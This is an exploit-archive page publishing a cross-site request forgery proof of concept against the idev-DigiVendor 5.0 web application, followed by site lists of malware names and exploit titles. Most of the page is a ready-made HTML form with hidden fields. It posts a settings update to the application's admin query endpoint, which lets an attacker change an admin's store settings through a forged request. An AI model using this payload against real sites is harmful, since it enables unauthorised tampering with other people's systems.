idev-DigiVendor 5.0 Cross Site Request Forgery

Posted on 05 April 2012

# Exploit Title: idev-DigiVendor 5.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-digivendor/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com

<form name="form1" method="post" action="../library/query.php">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="noreply@idevspot.com" type="hidden">
<input name="MAXDL" class="hiddenarea100" value="25" type="hidden">
<input name="SIGNATURE" class="hiddenarea100" value="idev-DigiVendor" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option></option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Drupal-Wiki 8.31 / 8.30 Cross Site Scripting
Kortex 1.0 SQL Injection
POMS PHP 1.0 SQL Injection / Shell Upload
iboss Secure Web Gateway Cross Site Scripting
Clinic Queuing System 1.0 Remote Code Execution

Last 20